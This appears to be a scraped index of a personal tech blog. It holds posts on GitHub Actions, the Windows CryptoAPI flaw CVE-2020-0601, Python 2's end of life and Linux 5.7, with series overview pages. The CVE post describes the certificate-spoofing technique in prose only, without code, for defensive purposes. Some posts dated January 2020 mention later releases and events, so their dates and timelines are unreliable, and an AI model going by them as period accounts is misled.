For deploying to production, I\u0026rsquo;d want to see more maturity in areas like approval gates, environment management, and deployment tracking before going all-in.\nThe CI/CD landscape in 2020 is more competitive than it\u0026rsquo;s been in years, and that\u0026rsquo;s great for developers. Whether you\u0026rsquo;re on GitHub Actions, GitLab CI, CircleCI, or even good old Jenkins — the bar is being raised for everyone.\n","date":"16 January 2020","externalUrl":null,"permalink":"/posts/200116-github-actions-reshaping-ci-cd/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Actions went generally available in November 2019. Two months in, the migration patterns are becoming clear — and the implications for the CI/CD landscape are significant.","title":"GitHub Actions Is Quietly Reshaping CI/CD — Two Months After GA","type":"posts"},{"content":"This week, something unusual happened in the security world. The NSA — yes, that NSA — publicly disclosed a critical vulnerability in Windows 10\u0026rsquo;s cryptographic library. CVE-2020-0601 affects the way Windows validates Elliptic Curve Cryptography (ECC) certificates, and it\u0026rsquo;s about as serious as crypto bugs get. Microsoft shipped the fix in Tuesday\u0026rsquo;s Patch Tuesday release.\nBut the real story isn\u0026rsquo;t just the bug itself. It\u0026rsquo;s who found it and what they did with it. This disclosure stands in stark contrast to the historical revelations about CIA and NSA relationships with encryption vendors, and it raises important questions about government transparency in cybersecurity.\nWhat CVE-2020-0601 Actually Does # The vulnerability lives in crypt32.dll, specifically in the code that validates ECC certificate chains. The flaw allows an attacker to craft a certificate that spoofs a trusted root certificate authority. 
In practical terms, this means:\nHTTPS interception: An attacker could create a fake certificate for any website that Windows would accept as legitimate. Your browser (Edge, Chrome on Windows, IE) would show the green padlock with no warnings. Code signing bypass: Malicious executables could be signed with forged certificates, making them appear to come from trusted software vendors. Signed email spoofing: S/MIME signed emails could be forged to appear from trusted senders. The technical root cause is that Windows didn\u0026rsquo;t properly validate the explicit curve parameters in ECC certificates. An attacker can specify their own generator point for a known curve, effectively creating a different private key that Windows will accept as valid for a trusted CA\u0026rsquo;s public key. It\u0026rsquo;s an elegant attack — no brute force, no side channels, just a logic flaw in parameter validation.\nFor anyone interested in the cryptographic details, the issue is essentially that Windows allows the explicit specification of curve parameters (including the generator point G) even for named curves like P-256. By choosing a custom G that maps your rogue private key to the target CA\u0026rsquo;s public key, you can forge any certificate in the chain.\nWhy NSA Disclosure Matters # Here\u0026rsquo;s where it gets interesting. The NSA has historically been associated with hoarding zero-day vulnerabilities, not reporting them. The EternalBlue exploit — the NSA-developed weapon that leaked and powered WannaCry — is still fresh in many people\u0026rsquo;s memories. That was only three years ago.\nThis time, the NSA chose to report the vulnerability to Microsoft through proper channels and coordinated the disclosure. Anne Neuberger, director of the NSA\u0026rsquo;s Cybersecurity Directorate (a relatively new division, established in 2019), has been publicly pushing for a more transparent approach to vulnerability disclosure.\nI think this is genuinely significant. 
Whether you trust the NSA\u0026rsquo;s motives or not, the practical outcome is positive: a critical vulnerability was found and patched before it could be exploited in the wild. That\u0026rsquo;s how the system is supposed to work.\nIt also suggests that the NSA\u0026rsquo;s internal calculus is shifting. The argument for hoarding vulnerabilities has always been offensive capability — if we know about it and others don\u0026rsquo;t, we can use it. But EternalBlue demonstrated the catastrophic downside: when hoarded vulnerabilities leak, the damage is indiscriminate and massive.\nPatch Urgency and Practical Impact # Microsoft has rated this as \u0026ldquo;Important\u0026rdquo; rather than \u0026ldquo;Critical\u0026rdquo; in their severity classification, which I think undersells the risk. The attack surface is enormous — this affects every Windows 10 and Windows Server 2016/2019 system. The fact that it undermines the entire certificate trust model on Windows makes it functionally critical for any enterprise environment.\nIf you\u0026rsquo;re an IT admin or security engineer, here\u0026rsquo;s what to do:\nPatch immediately: This is not one to wait for your regular patch cycle. KB4528760 for Windows 10 1909/1903. Monitor for exploitation: The NSA\u0026rsquo;s advisory includes detection guidance. Look for certificates with explicit curve parameters where you\u0026rsquo;d expect named curves. Review your certificate validation: If you have custom applications that do their own TLS certificate validation on Windows, verify they use the updated CryptoAPI. Test your detection: Proof-of-concept code will almost certainly appear soon. Security researcher Saleem Rashid already demonstrated a working exploit within hours of the patch release. The Bigger Picture for Crypto Libraries # This bug is a reminder of something I\u0026rsquo;ve seen throughout my career: cryptographic code is extraordinarily difficult to get right. 
The vulnerability isn\u0026rsquo;t a buffer overflow or a memory corruption — it\u0026rsquo;s a logic error in certificate validation. Those are much harder to find with fuzzing or automated tools. Years later, the industry would face even more serious supply chain attacks that combined cryptographic exploitation with broader infrastructure compromise.\nThe OpenSSL library has historically handled ECC parameter validation more strictly, which is partly why Linux systems aren\u0026rsquo;t affected. But that\u0026rsquo;s not cause for complacency. Every crypto library has its own dark corners. The fact that this bug existed in shipping Windows code for years without anyone (apparently) exploiting it is either lucky or concerning, depending on how much you trust that \u0026ldquo;no exploitation in the wild\u0026rdquo; claim.\nFor developers: if you\u0026rsquo;re implementing anything involving certificate validation, TLS, or cryptographic verification — please don\u0026rsquo;t roll your own. Use well-tested libraries, keep them updated, and when possible, use the strictest validation settings available.\nMy Take # I\u0026rsquo;m cautiously optimistic about what this disclosure represents. A major intelligence agency choosing transparency over exploitation is a net positive for the security ecosystem. I don\u0026rsquo;t think it means the NSA has stopped stockpiling zero-days entirely — but it suggests the Vulnerabilities Equities Process is actually working in at least some cases.\nThe vulnerability itself is a perfect example of why cryptographic security is never \u0026ldquo;done.\u0026rdquo; You can have a well-designed protocol, a trusted implementation, and years of production use — and still have a fundamental logic flaw hiding in the parameter validation code.\nPatch your Windows boxes. 
Today, not tomorrow.\n","date":"9 January 2020","externalUrl":null,"permalink":"/posts/200109-nsa-cve-2020-0601-windows-cryptoapi/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The NSA disclosed CVE-2020-0601, a critical vulnerability in Windows CryptoAPI’s certificate validation. The fact that they reported it instead of hoarding it marks a notable shift.","title":"The NSA Found a Critical Windows Crypto Bug — And That's Actually Good News","type":"posts"},{"content":"The calendar flipped to 2020, and with it, Python 2 quietly drew its last official breath. As of January 1st, Python 2 is no longer supported by the Python Software Foundation. No more security patches, no more bug fixes, nothing. After nearly 20 years of service and over a decade of coexistence with Python 3, the plug has finally been pulled.\nI\u0026rsquo;ve been writing Python since the late 2.x days, and I have to say — this moment feels both overdue and slightly melancholic.\nA Transition That Took Way Too Long # Let\u0026rsquo;s be honest about this: the Python 2 to 3 migration has been one of the longest and most painful language transitions in software history. Python 3.0 was released in December 2008. That means we\u0026rsquo;ve had eleven years of overlap. Eleven years where the community was effectively split, where library authors had to maintain compatibility with both versions, and where the print statement versus print() function became a tribal marker.\nThe original end-of-life date was supposed to be 2015. It got extended to 2020 because the ecosystem simply wasn\u0026rsquo;t ready. Major libraries like NumPy, Django, and Requests took years to fully support Python 3, and many organizations had massive codebases that couldn\u0026rsquo;t be migrated overnight.\nThe Python Clock has been counting down for years, and now it\u0026rsquo;s at zero. 
But if you think everyone has migrated, I have some disappointing news.\nThe Real-World Impact # In my experience consulting with various teams, the reality is messier than the official timeline suggests. I know of production systems — important ones, handling real money and real data — that are still running Python 2.7. Some of these systems were written in 2010 and have been \u0026ldquo;stable\u0026rdquo; enough that nobody wanted to touch them.\nThe end-of-life doesn\u0026rsquo;t mean Python 2 stops working. Your scripts will still run on January 2nd exactly as they did on December 31st. What it means is:\nNo security patches: Any new vulnerabilities discovered in CPython 2.7 will not be fixed upstream. This is the big one. If you\u0026rsquo;re running internet-facing services on Python 2, you\u0026rsquo;re now accumulating unpatched security debt. Library abandonment: Major libraries have been dropping Python 2 support. NumPy stopped supporting Python 2 as of January 1st. pandas, matplotlib, and many others have announced similar timelines. No new features: Obviously. But more importantly, tooling like pip and setuptools will eventually stop working reliably with Python 2. Lessons From The Longest Goodbye # There are some real lessons here for the broader software engineering community. The Python 2/3 split was in many ways a case study in how not to handle a breaking language change.\nThe core mistake was underestimating how much breaking print, changing string handling (bytes vs. unicode), and altering integer division would impact real-world code. These weren\u0026rsquo;t obscure corner cases — they touched virtually every Python program ever written.\nWhat the Python community eventually got right was tooling. The 2to3 tool, six library, and the __future__ imports made gradual migration possible. Projects like python-modernize helped automate large chunks of the conversion. 
If you\u0026rsquo;re still facing a migration, these tools are mature and battle-tested at this point.\nThe other lesson is about organizational inertia. Technical migrations don\u0026rsquo;t happen because a deadline exists on a website. They happen when there\u0026rsquo;s business pressure — when a critical library drops support, when a security audit flags the risk, or when hiring becomes difficult because nobody wants to write Python 2 anymore.\nWhat To Do If You\u0026rsquo;re Still On Python 2 # If you\u0026rsquo;re reading this and your team still has Python 2 code in production, here\u0026rsquo;s my pragmatic advice:\nAudit your exposure: Identify which Python 2 services are internet-facing or handle sensitive data. These are your highest-priority migration targets. Pin your dependencies: Lock down your Python 2 environment completely. You don\u0026rsquo;t want a library update accidentally breaking things when you least expect it. Start with tests: If you don\u0026rsquo;t have good test coverage on your Python 2 code, add it before you migrate. The pytest framework works well with both versions and makes the transition smoother. Use python-modernize: It\u0026rsquo;s the most practical tool for converting Python 2 code to code that runs on both 2 and 3, which you can then clean up for Python 3 only. Budget for it: This isn\u0026rsquo;t a weekend project for a large codebase. I\u0026rsquo;ve seen migrations of substantial applications take 3-6 months with dedicated engineering effort. After the successful migration to Python 3, the language continued to evolve rapidly. Python 3.9 brought significant improvements, followed by structural pattern matching in Python 3.10 and substantial performance improvements with Python 3.11.\nMy Take # I\u0026rsquo;m glad Python 2 is finally done. The dual-version world was a drag on the entire ecosystem. 
Every library maintainer who had to keep if sys.version_info[0] \u0026gt;= 3 branches alive deserves a thank-you note.\nBut I also think there\u0026rsquo;s a cautionary tale here for every language community. Breaking changes are sometimes necessary, but the cost of a fragmented ecosystem is enormous. It\u0026rsquo;s something I think about when I see discussions about the next major version of various languages. Backward compatibility isn\u0026rsquo;t glamorous, but it\u0026rsquo;s the bedrock of developer trust.\nHere\u0026rsquo;s to a new decade with a single, unified Python. Now, about those f-strings — if you haven\u0026rsquo;t tried them yet, you\u0026rsquo;re missing out on one of the best small features Python 3 brought to the table. The subsequent evolution of the language shows how vibrant the Python ecosystem became once the 2/3 split was finally resolved.\n","date":"2 January 2020","externalUrl":null,"permalink":"/posts/200102-python2-end-of-life-new-decade/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 2 officially reached end-of-life on January 1, 2020. 
After over a decade of transition, what does this mean for teams still running Python 2 code?","title":"Python 2 Is Dead — Long Live Python 3","type":"posts"},{"content":"title: \u0026ldquo;Linux Kernel 5.7 — A Quiet Release with Lasting Impact\u0026rdquo; date: 2020-06-04 draft: false tags:\n\u0026ldquo;Open Source\u0026rdquo; \u0026ldquo;Development\u0026rdquo; \u0026ldquo;Linux\u0026rdquo; categories: \u0026ldquo;Open Source\u0026rdquo; series: \u0026ldquo;Open Source Chronicles\u0026rdquo; summary: \u0026ldquo;Linux 5.7 ships with split-lock detection, the new ExFAT driver, userfaultfd improvements, and a thermal management overhaul — a release that matters more than its headlines suggest.\u0026rdquo; description: \u0026ldquo;Linux 5.7 ships with split-lock detection, the new ExFAT driver, and significant thermal management improvements.\u0026rdquo; authors: [\u0026ldquo;Osmond van Hemert\u0026rdquo;] featured_image_alt: \u0026ldquo;Technology infrastructure and digital architecture with interconnected systems and data flows\u0026rdquo; Linux 5.7 was released by Linus Torvalds on May 31st, and as with many kernel releases, the changelog reads like infrastructure plumbing rather than flashy features. But this one has several changes that developers and sysadmins should pay attention to, particularly if you\u0026rsquo;re running virtualized workloads or dealing with storage performance.\nThe ExFAT Driver: A Microsoft Collaboration # Perhaps the most symbolically interesting addition is the new ExFAT file system driver, contributed by Samsung and developed with Microsoft\u0026rsquo;s blessing. Microsoft published the ExFAT specification last year and encouraged a proper in-kernel implementation. This collaboration exemplifies the broader Microsoft-loves-Linux narrative that has accelerated over the past few years. 
The previous ExFAT support in Linux was a staging driver with known issues and questionable legal standing.\nThe new driver is clean, performant, and properly licensed. For those of us who regularly shuttle data between Linux and Windows systems — or deal with SD cards and USB drives formatted as ExFAT — this is a genuine quality-of-life improvement. A collaboration like this would have been unthinkable a decade ago.\nI\u0026rsquo;ve tested the new driver with a few large file transfers and it\u0026rsquo;s noticeably more stable than the old staging driver. No more occasional corruption on unmount, which was a persistent annoyance.\nSplit-Lock Detection: Protecting Multi-Tenant Performance # The split-lock detection feature is one of those kernel changes that most developers will never interact with directly but that matters enormously for anyone running shared infrastructure. A split-lock occurs when an atomic operation spans a cache line boundary, forcing the CPU to lock the entire memory bus to maintain coherence. This is extremely expensive — a single split-lock can stall all cores for hundreds of cycles.\nIn a bare-metal single-tenant environment, this is mostly a self-inflicted performance wound. But in virtualized or multi-tenant environments — read: the cloud — one misbehaving VM can degrade performance for every other VM sharing the same physical host.\nKernel 5.7 adds the ability to detect split-lock operations and either warn about them or kill the offending process. For cloud providers, this is a meaningful tool for ensuring fair resource allocation. I expect we\u0026rsquo;ll see this enabled by default in cloud kernels fairly quickly.\nThe configuration options are sensible: split_lock_detect=fatal kills processes that trigger split-locks, while split_lock_detect=warn just logs them. 
For development environments, the warning mode is useful for catching performance issues before they hit production.\nUserfaultfd Write Protection: Better Live Migration # The userfaultfd subsystem — which allows user-space programs to handle page faults — got write-protection tracking support. This sounds obscure, but it\u0026rsquo;s a key enabler for two important use cases: database snapshotting and VM live migration.\nFor live migration specifically, write-protection tracking allows the hypervisor to efficiently identify which memory pages have been modified during migration. Instead of re-scanning all of memory, the kernel notifies user-space when a page is dirtied. This translates to faster migration times and shorter blackout periods when moving VMs between hosts.\nIf you\u0026rsquo;re running KVM-based virtualization, this is relevant. QEMU already has patches to take advantage of this feature, and I\u0026rsquo;d expect production hypervisors to adopt it over the next few kernel release cycles.\nThermal Management and ARM Progress # The kernel\u0026rsquo;s thermal management framework got a significant overhaul in 5.7, with the new power_allocator governor providing more intelligent thermal throttling. Instead of the crude step-down approach used previously, the new governor uses a PID controller to maintain target temperatures while maximizing performance. This matters for containerized workloads running on Kubernetes or Docker-based infrastructure where thermal efficiency directly impacts resource utilization.\nThis matters particularly for ARM-based systems, which are increasingly showing up in edge computing and server scenarios. The Raspberry Pi 4, various ARM development boards, and AWS Graviton2 instances all benefit from better thermal management.\nSpeaking of ARM, 5.7 continues the trend of improving ARM64 support with new SoC additions and driver improvements. 
The kernel\u0026rsquo;s ARM ecosystem has matured significantly — three years ago, running a mainline kernel on ARM hardware was an adventure. Today, it\u0026rsquo;s largely unremarkable, which is exactly where it should be.\nOther Noteworthy Changes # A few other additions worth mentioning:\nBPF improvements: The BPF subsystem continues to expand, with new helper functions and better BTF (BPF Type Format) support. BPF is quietly becoming one of the most important subsystems in the kernel for observability and networking. Habana Labs Gaudi AI accelerator support: Another AI training accelerator gets kernel support, reflecting the growing diversity of hardware in the ML training space. Zonefs file system: A new file system for zoned block devices (primarily SMR hard drives), co-developed by Western Digital. As storage media becomes more diverse, the kernel needs to support different access patterns. My Take # Linux 5.7 is a \u0026ldquo;boring\u0026rdquo; release in the best possible sense. No dramatic restructuring, no contentious API changes — just steady improvement of the infrastructure that runs most of the internet. The split-lock detection and userfaultfd improvements are exactly the kind of changes that make Linux better for cloud workloads without breaking anything for desktop or embedded users.\nI\u0026rsquo;ve been running Linux kernels in production since the 2.4 days, and what strikes me about the modern development process is how mature it\u0026rsquo;s become. The merge window is predictable, the release candidates are genuinely stable, and the range of hardware and use cases covered by each release is extraordinary.\nThe ExFAT driver is a nice cherry on top — not because the technology is particularly interesting, but because it represents the kind of cross-company collaboration that was rare in open source just a few years ago. 
Microsoft contributing patent rights so Linux can properly support their file system is a concrete act, not just a press release.\nIf you\u0026rsquo;re running production systems, I\u0026rsquo;d recommend updating to 5.7 after it lands in your distribution\u0026rsquo;s update channel. The split-lock detection alone is worth it for anyone running multi-tenant workloads. For the rest of us, it\u0026rsquo;s another solid release from a project that\u0026rsquo;s been consistently delivering for nearly 30 years.\n","externalUrl":null,"permalink":"/posts/200604-linux-kernel-57-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"","title":"","type":"posts"},{"content":" Hi, I\u0026rsquo;m Osmond # Senior software engineer, thirty years in. I started on Win32 and Borland Delphi, spent a decade in .NET when it was the answer to everything, and have been mostly in JavaScript and Node.js for the last ten years. None of these were good ideas at the time. All of them taught me something useful.\nWhat I Do # I write code, review code, and argue about code. The mix shifts depending on the team — some weeks it\u0026rsquo;s mostly architecture diagrams and trade-off documents, some weeks it\u0026rsquo;s pair-debugging a flaky deploy at 11pm. I prefer the second kind.\nI\u0026rsquo;m drawn to systems with too many moving parts: distributed services, build pipelines, anything that involves a queue and at least one timeout. I\u0026rsquo;m wary of abstractions that exist mostly to make a CV look richer, and I have strong opinions about logging, on-call rotations, and the right way to write a post-mortem.\nWhat I Write About # The blog is mostly notes-to-myself that turned out to be useful to other people. The recurring themes:\nAI \u0026amp; Machine Learning — the model releases, the framework wars, and the uncomfortable gap between demos and production. 
Security — supply-chain attacks, zero-days, and the boring controls that would have stopped half of them. Infrastructure — Kubernetes, DevOps, the platform engineering tax. Development — languages, runtimes, and tooling that\u0026rsquo;s worth the switching cost (most isn\u0026rsquo;t). Open Source — governance, funding, and the maintainers we keep losing. Connect # You can find me on:\nGitHub LinkedIn X / Twitter ","externalUrl":null,"permalink":"/about/","section":"Osmond van Hemert — Senior Software Engineer","summary":"","title":"About","type":"page"},{"content":" Overview # While machine learning engineers optimize algorithms, the real story of AI\u0026rsquo;s impact plays out in boardrooms, legislatures, and international treaties. This series covers the business and policy dimensions of AI—venture capital funding rounds, regulatory frameworks across regions, ethical debates over alignment and bias, and the geopolitical competition reshaping technology policy worldwide.\nUnderstanding this context is essential for anyone building AI systems—it shapes what you can deploy, who your customers are, and what constraints you\u0026rsquo;ll face.\nWhat You\u0026rsquo;ll Find Here # Investment \u0026amp; Market Dynamics: Major funding announcements, strategic partnerships, and how capital flows signal where AI development is accelerating.\nRegulatory Landscape: GDPR, AI Act, executive orders, and how different regions approach AI governance and safety requirements.\nEthical \u0026amp; Safety Debates: Alignment research, bias in AI systems, consent and data usage, and the philosophical questions about AI\u0026rsquo;s role in society.\nGeopolitical Dynamics: US-China competition, brain drain, chip export restrictions, and how AI has become a strategic technology.\nLabor \u0026amp; Society: Impact on employment, skills gaps, education adaptation, and how organizations are managing AI adoption at scale.\nLearning Path # Understand the investment landscape — 
who\u0026rsquo;s funding AI, at what valuations, and what that signals about market confidence Learn regulatory frameworks — what\u0026rsquo;s actually required in different regions and how to interpret guidelines Explore ethical considerations — what \u0026ldquo;responsible AI\u0026rdquo; means in practice and where the hardest problems are Track geopolitical shifts — how AI is reshaping global technology policy and competition Anticipate labor impacts — how AI adoption will likely reshape work and what that means for your organization Key Topics Covered # Funding \u0026amp; Valuations: Venture rounds, IPOs, acqui-hires, and strategic AI investments by big tech Policy \u0026amp; Regulation: EU AI Act, US executive orders, international governance, and compliance frameworks Safety \u0026amp; Ethics: Alignment, bias mitigation, explainability, and responsible AI principles Market Structure: Competitive dynamics, consolidation, and emerging business models around AI International Relations: Technology policy, export controls, talent competition, and strategic autonomy Related Series # Explore complementary areas: AI Models \u0026amp; Releases (the technical foundation of business decisions), Industry \u0026amp; Platforms (broader technology industry trends and strategies)\n","externalUrl":null,"permalink":"/series/ai-industry--regulation/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"AI Industry \u0026 Regulation","type":"series"},{"content":" Overview # The pace of AI model development has become breathtaking. This series tracks foundation models and their releases, from OpenAI\u0026rsquo;s GPT family and Anthropic\u0026rsquo;s Claude to open-source alternatives like Llama, Mistral, and Qwen. 
We analyze benchmarks, capabilities, pricing implications, and what each new release means for developers, researchers, and organizations building AI products.\nThe story goes beyond model architecture—it\u0026rsquo;s about capabilities, accessibility, costs, and the race to deploy state-of-the-art AI.\nWhat You\u0026rsquo;ll Find Here # Model Announcements: In-depth analysis of major model releases—new capabilities, performance improvements, context window expansions, and multimodal advances.\nBenchmark \u0026amp; Performance: Understanding model evaluation, comparing benchmarks across providers, and what performance metrics actually mean for your use case.\nOpen vs. Proprietary: The ecosystem shift toward open-weight models, fine-tuning capabilities, self-hosting trade-offs, and cost comparisons.\nPractical Integration: How to use these models via APIs, deploy locally, fine-tune for specific tasks, and navigate pricing and rate limits.\nIndustry Impact: How AI advances shape product strategy, influence hiring, and accelerate development workflows across industries.\nLearning Path # Grasp the foundation model landscape — understand proprietary models vs. open-weight alternatives Learn to evaluate models — benchmarks, actual performance on your domain, and capability comparisons Explore integration patterns — APIs vs. 
local deployment, fine-tuning, and cost optimization Track competitive dynamics — how releases shape the market and influence adoption Stay informed on breakthroughs — major capability jumps like multimodal or longer context windows Key Technologies \u0026amp; Models Covered # Model Families: GPT-4, Claude, Llama, Mistral, Qwen, Gemini, and emerging open-source models Capabilities: Text generation, code generation, vision/multimodal, reasoning, and instruction-following Infrastructure: vLLM, Ollama, Hugging Face inference, and self-hosting frameworks Integration: OpenAI API, Anthropic API, Groq, Together AI, and open-source alternatives Evaluation: MMLU, HumanEval, benchmarking methodologies, and custom evaluation frameworks Related Series # Explore complementary areas: Python Evolution (Python as the primary language for ML), Developer Tooling (AI-powered coding assistants and development tools), Open Source AI (open-weight models and community development)\n","externalUrl":null,"permalink":"/series/ai-models--releases/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"AI Models \u0026 Releases","type":"series"},{"content":" Overview # Security breaches and zero-day vulnerabilities reveal how systems fail under real attack. This series dissects significant security incidents, analyzing attack chains, exploited vulnerabilities, attacker motivations, and most importantly—what defenders can learn. Each incident tells a story about architecture decisions, detection blind spots, and what preventive measures actually work.\nThe goal isn\u0026rsquo;t alarmism—it\u0026rsquo;s understanding how to build systems that can withstand sophisticated attacks.\nWhat You\u0026rsquo;ll Find Here # Breach Autopsy: Deep analysis of high-impact breaches—from initial compromise through lateral movement to data exfiltration. 
Understanding attack chains helps you spot similar patterns.\nZero-Day Analysis: When vulnerabilities are exploited without warning—analyzing exploitation techniques, the researcher/attacker incentive structure, and how vendors respond.\nAttack Campaigns: Tracking persistent threat actors, their tools and techniques, and how their tactics evolve over time.\nDefensive Lessons: What each incident teaches us—configuration mistakes, detection gaps, and controls that actually prevented worse outcomes.\nIndustry Impact: How breaches reshape compliance requirements, vendor contracts, and organizational security practices.\nLearning Path # Learn attack fundamentals — understand common exploitation techniques and how attackers chain vulnerabilities Study real incidents — analyze actual breaches to spot patterns in how systems get compromised Trace defensive gaps — understand where and why standard controls failed in high-profile incidents Monitor emerging techniques — stay ahead of adversary tactics as they evolve Apply lessons to your architecture — understand how breach learnings apply to systems you build Key Areas Covered # Attack Techniques: Phishing, credential theft, privilege escalation, lateral movement, persistence, and exfiltration Vulnerable Components: Web applications, APIs, databases, authentication systems, and supply chain dependencies Detection \u0026amp; Response: How incidents were discovered, response effectiveness, and what slowed attackers down Infrastructure Decisions: Configuration errors, lack of segmentation, inadequate logging, and visibility gaps Attacker Motivation: Nation-state espionage, financially motivated attacks, hacktivism, and insider threats Related Series # Explore complementary areas: Cybersecurity Landscape (broader security trends and defenses), Supply Chain Security (dependency vulnerabilities and ecosystem attacks)\n","externalUrl":null,"permalink":"/series/breaches--zero-days/","section":"Blog Series: In-Depth Tech Coverage on AI, 
Security \u0026 Cloud","summary":"","title":"Breaches \u0026 Zero-Days","type":"series"},{"content":" Overview # Technology industry dynamics shape what tools exist, which platforms thrive, and where investment flows. This series covers the business side of tech—platform strategies by giants (Google, Meta, Microsoft, Apple), market consolidation through acquisitions, emerging competition, and the strategic decisions reshaping the industry.\nUnderstanding industry trends helps product leaders, architects, and engineers anticipate shifts and make forward-looking technical decisions.\nWhat You\u0026rsquo;ll Find Here # Platform Strategies: How tech giants position competing platforms—from operating systems and cloud infrastructure to social networks and developer platforms.\nAcquisitions \u0026amp; Consolidation: Understanding major acquisitions, how they reshape competitive dynamics, and what integration strategies reveal about long-term vision.\nMarket Shifts: When new technologies emerge (generative AI, quantum computing) or incumbents falter, industry restructuring follows.\nDeveloper Ecosystem: How platforms invest in developer experiences, APIs, and ecosystems to enable third-party innovation.\nInternational Dynamics: Regulatory pressures from the EU and China, data sovereignty concerns, and how policy shapes market opportunities.\nVenture \u0026amp; Startup Trends: Where capital flows, and what that signals about where the industry believes innovation is happening.\nLearning Path # Understand platform economics — network effects, lock-in, and what makes platforms defensible Track major acquisitions — understand why companies are acquired and what their integration signals about strategic direction Monitor competitive positioning — watch how leaders defend market share against emerging threats Anticipate market shifts — recognize signals of disruption before they\u0026rsquo;re obvious Evaluate emerging trends — distinguish hype from fundamental shifts that will reshape the industry Key Areas 
Covered # Tech Giants: Google, Amazon, Microsoft, Apple, Meta, and their platform strategies Market Segments: Cloud computing, developer tools, social media, search, and AI infrastructure Acquisitions: Strategic rationales, integration outcomes, and market implications Startups \u0026amp; Disruption: Venture funding trends and emerging companies challenging incumbents Regulation \u0026amp; Policy: Data privacy, antitrust, international competition, and how policy affects business models Developer Ecosystems: APIs, SDKs, communities, and platform investments in enabling third-party development Related Series # Explore complementary areas: Cloud Platform Watch (strategic moves by cloud providers), AI Industry \u0026amp; Regulation (how AI is reshaping industry dynamics)\n","externalUrl":null,"permalink":"/series/industry--platforms/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Industry \u0026 Platforms","type":"series"},{"content":" Overview # The JavaScript ecosystem is in constant motion. This series tracks the evolution of server-side JavaScript, focusing on the runtime wars between Node.js, Deno, and Bun, the rapid iteration of frameworks and tooling, and what these changes mean for developers building production systems.\nJavaScript\u0026rsquo;s dominance extends beyond browsers into backend infrastructure, DevOps, and systems programming. 
Understanding these trends helps developers make informed decisions about runtime selection, dependency management, and architectural patterns.\nWhat You\u0026rsquo;ll Find Here # Runtime Evolution: Track how Node.js, Deno, and Bun compete and converge—from workspace support to package manager wars to native module compatibility.\nFramework \u0026amp; Tooling: Deep-dives into modern development tools, testing frameworks, bundlers, and the developer experience layer that shields us from runtime complexity.\nPerformance \u0026amp; Architecture: Lessons on optimizing server-side JavaScript, understanding async/await patterns, and building scalable applications.\nEcosystem Decisions: Analysis of dependency vulnerabilities, package manager security, version management, and the practical considerations for production teams.\nLearning Path # Start with runtime comparisons — understand why Node.js dominates, what Deno and Bun bring to the table, and which runtime fits your use case Explore tooling evolution — see how bundlers, test runners, and linters are consolidating or specializing Dive into specific challenges — monorepo strategies, performance optimization, and security practices Follow industry shifts — watch how major platforms adopt new runtimes, how compatibility layers evolve, and when to migrate Key Technologies Covered # Runtimes: Node.js, Deno, Bun, and emerging alternatives Package Managers: npm, yarn, pnpm, and their security/performance tradeoffs Frameworks: Express, Fastify, Hono, and server-side rendering patterns Tooling: Vitest, Jest, esbuild, Turbopack, and developer productivity tools Databases \u0026amp; APIs: Integration patterns with backend services Related Series # Explore complementary areas: AI Models \u0026amp; Releases (AI-powered development tools), Developer Tooling (broader IDE and build system trends), Supply Chain Security (dependency and package manager 
security)\n","externalUrl":null,"permalink":"/series/javascript--node.js/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"JavaScript \u0026 Node.js","type":"series"},{"content":" Overview # Kubernetes has become the standard for container orchestration, but it\u0026rsquo;s also one of the most complex systems to operate. This series covers Kubernetes evolution, operational patterns that work in production, the mature ecosystem around containers, and how organizations at scale manage containerized infrastructure.\nWhether you\u0026rsquo;re adopting containers or optimizing existing deployments, understanding these patterns separates smooth operations from constant firefighting.\nWhat You\u0026rsquo;ll Find Here # Kubernetes Releases: Analyzing new Kubernetes versions, feature removals, and improvements—understanding what matters for your clusters.\nProduction Patterns: Real-world deployment patterns, multi-cluster strategies, network policies, and resource management in production systems.\nService Mesh Evolution: How service meshes (Istio, Linkerd) add observability and reliability, and when they\u0026rsquo;re worth the complexity.\nOperator Development: Building Kubernetes operators to automate complex application lifecycle management and stateful workload orchestration.\nContainer Ecosystem: Docker alternatives, image registries, vulnerability scanning, and supply chain security for containers.\nCost Optimization: Resource management, node rightsizing, cluster scaling, and optimizing Kubernetes costs.\nLearning Path # Master Kubernetes basics — understand pods, services, deployments, and core abstractions Learn production patterns — network policies, resource limits, logging, and monitoring Explore advanced architectures — multi-cluster, service mesh, and operator patterns Understand the ecosystem — observability tools, container runtimes, and supporting infrastructure Optimize for production — cost, security, 
and operational efficiency at scale Key Topics Covered # Core Kubernetes: Pods, services, deployments, statefulsets, and native resources Networking: CNI, network policies, ingress, load balancing, and service discovery Storage: Persistent volumes, storage classes, backup strategies, and stateful workloads Operators \u0026amp; CRDs: Custom resources, operator frameworks, and lifecycle management Service Mesh: Istio, Linkerd, Envoy, and observability/security benefits Observability: Prometheus, Grafana, Jaeger, distributed tracing, and cluster monitoring Security: RBAC, network policies, pod security policies, and secrets management Container Runtimes: containerd, CRI-O, and alternatives to Docker Related Series # Explore complementary areas: Cloud Operations (operating containerized infrastructure), Cloud Platform Watch (managed Kubernetes services from cloud providers)\n","externalUrl":null,"permalink":"/series/kubernetes--containers/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Kubernetes \u0026 Containers","type":"series"},{"content":" Overview # Systems programming is being revolutionized. Rust addresses C/C++\u0026rsquo;s memory safety issues without garbage collection, Go provides pragmatic simplicity for backend infrastructure, and emerging languages like Zig, Odin, and V challenge fundamental assumptions about language design. 
